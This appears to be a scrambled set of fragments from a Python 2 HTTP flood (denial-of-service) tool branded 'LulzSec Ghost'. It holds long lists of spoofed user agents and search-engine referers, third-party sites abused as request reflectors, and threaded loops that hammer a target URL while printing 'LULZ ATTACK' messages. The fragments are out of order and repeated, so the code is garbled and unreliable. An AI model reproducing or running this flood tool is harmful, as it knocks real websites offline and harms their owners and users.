http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika", "240x320)') headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/5.0 (X11; U; Linux", "4.1.2; en-au; GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591')", "global bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") 
bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\")", "4.0.3; ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0') headers_useragents.append(' Mozilla/5.0", "if url.count(\"/\")==2: url = url + \"/\" m = re.search('http\\://([^/]*)/?.*', url) host =", "def run(self): try: while flag<2: code=httpcall(url) if (code==800) & (safe==1): set_flag(2) except Exception,", "UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)')", "HTTPThread(threading.Thread): def run(self): try: while flag<2: code=httpcall(url) if (code==800) & (safe==1): set_flag(2) except", "6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64)", "search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com;", "dev; http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0", "~ / / / / / / / / ~ ~~ ~~~ ~~~", "Presto/2.5.22 
Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de')", "#execute if len(sys.argv) < 2: usage() sys.exit() else: if sys.argv[1]==\"help\": usage() sys.exit() else:", "if len(sys.argv)== 3: if sys.argv[2]==\"safe\": set_safe() url = sys.argv[1] if url.count(\"/\")==2: url =", "keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy S5') keyword_top.append('Nexus 6') keyword_top.append('Moto G') keyword_top.append('Samsung Note 4') keyword_top.append('LG G3')", "(Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1", "Android 2.2; fr-fr; Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0", "4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4; en-us;') headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "#http caller thread class HTTPThread(threading.Thread): def run(self): try: while flag<2: code=httpcall(url) if (code==800)", "_.--| LOL |: <____|.----|| .---''---, The ;..__..' _... 
Lulz ,'/ ;|/..--'' \\ Boat", "Muncher v4x Build xxxxx') headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows;", "urllib2 import sys import threading import random import re #global params url='' host=''", "Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS) PLink 2.56b') headers_useragents.append('Mozilla/5.0", "(Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0", "5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)')", "<EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)') headers_useragents.append('AV", ")') headers_useragents.append('AxmoRobot - Crawling your site for better indexing on www.axmo.com search engine.')", "LinkChecker v2.0') headers_useragents.append('8484 Boston Project v 1.0') headers_useragents.append(':robot/1.0 (linux) ( admin e-mail: undefined", "// `:`. ,' \\ /-._; | : : :: ,. . 
,' ::", "Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824", "flag=val def set_safe(): global safe safe=1 # generates a user agent array def", "(web crawler; http://asked.jp; epicurus at gmail dot com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx')", "Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 7", "NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator 1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0')", "dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)') headers_useragents.append('Ace Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot')", "1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10')", "3.2)') headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo 3.2;') headers_useragents.append('ProxiNet; Danger hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML", "(+http://www.agada.de)') 
headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence search engine", "xxxxx') headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT", "6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U;", "(KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML,", "headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus 10", "(Germany)') headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona Accoona Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1", "powered by www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker", "1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14", "url = url + \"/\" m = 
re.search('http\\://([^/]*)/?.*', url) host = m.group(1) for", "crawler; www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1", "(Danger hiptop 3.4; U; AvantGo 3.2)') headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)') headers_useragents.append(' Mozilla/5.0 (compatible;", "NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0;", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; Nexus S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko)", "Android 3.0.1; en-us; A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;')", "headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh;", "Winter Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy S5') keyword_top.append('Nexus 6') keyword_top.append('Moto G') keyword_top.append('Samsung Note 4')", "(KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like", "headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT') 
headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com;", "X 10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U; AvantGo 3.2)') headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)')", "headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1", "Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36')", "O ._O O_. ; ; : `. // // // // ,' /", "keyword_top.append('Flappy Bird') keyword_top.append('Conchita Wurst') keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014 Sochi Winter Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy", "_____|\\ _.--| LOL |: <____|.----|| .---''---, The ;..__..' _... 
Lulz ,'/ ;|/..--'' \\", "sys.exit() else: print \"Script Priv8 Privada da LulzSec Ghost\" if len(sys.argv)== 3: if", "Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista", "headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator 1.0) NetFront/3.0')", "Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x nexus') keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber')", "3.2;') headers_useragents.append('ProxiNet; Danger hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31", "headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22", "UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS)", "& (previous<>request_counter): print \"%d lULZ Up\" % (request_counter) previous=request_counter if flag==2: print \"\\n", "headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev. 
273", "MSIE 3.02;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre)", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') #", "(Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534')", ": `. 
// // // // ,' / ~~~`.______//____//____//____//_______,'~ // //~ // //", "AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 7 Build/JOP40D)", "headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0')", "5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com", "rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US;", "(compatible; AvantGo 3.2;') headers_useragents.append('ProxiNet; Danger hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)')", "headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-au;", "| | || ' : `.`.) 
_,' |;._:: | | | | `|", "(Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile", "import re #global params url='' host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0 def inc_counter():", "headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)')", "U; Intel Mac OS X 10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows; N)') headers_useragents.append('itunes/9.0.2 (Macintosh;", "Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot", "(Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1;", "request def httpcall(url): useragent_list() referer_list() code=0 if url.count(\"?\")>0: param_joiner=\"&\" else: param_joiner=\"?\" request =", "like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux;", "engine - obeys robots.txt and robots meta tags ; http://balihoo.com/index.aspx; robot at balihoo", "like Gecko) Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1", "request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + 
buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection',", "try: while flag<2: code=httpcall(url) if (code==800) & (safe==1): set_flag(2) except Exception, ex: pass", "com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0')", "Engine; acorn.isara.org; acorn at isara dot org)') headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad", "global keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola')", "bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") 
bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\")", "(Axadine Crawler; http://www.axada.de/; )') headers_useragents.append('AxmoRobot - Crawling your site for better indexing on", "(compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot')", "keyword_top.append('jessica simpson') keyword_top.append('jacket') keyword_top.append('anderson east') keyword_top.append('kroger') ('http://' + host + '/') return(headers_referers) def", "'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code set_flag(1) print '[+]~>LULZ ATTACK", "8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT", "accoona dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)') headers_useragents.append('Ace Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)')", "headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0", "bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") 
bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots)", "PPC; 240x320)') headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows;", "headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona Accoona Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)')", "keyword_top.append('DJ Bach') keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x nexus') keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american eagle') keyword_top.append('jessica", "(GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0", "Mac OS X 10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0 Mobile", "~ _// ~ ~ / / / / / / / / ~", "\"\\n -lULZ Finish\" #execute if len(sys.argv) < 2: usage() sys.exit() else: if sys.argv[1]==\"help\":", "UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 
Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel", "370') keyword_top.append('ALS Ice Bucket Challenge') keyword_top.append('Flappy Bird') keyword_top.append('Conchita Wurst') keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014 Sochi", "AppleWebKit/536.26 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0", "beta blog crawler; www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp')", "(http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine;", "headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51", "for Balihoo.com search engine - obeys robots.txt and robots meta tags ; http://balihoo.com/index.aspx;", "headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') 
headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0')", "MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322;", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0", "headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=')", "rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO') 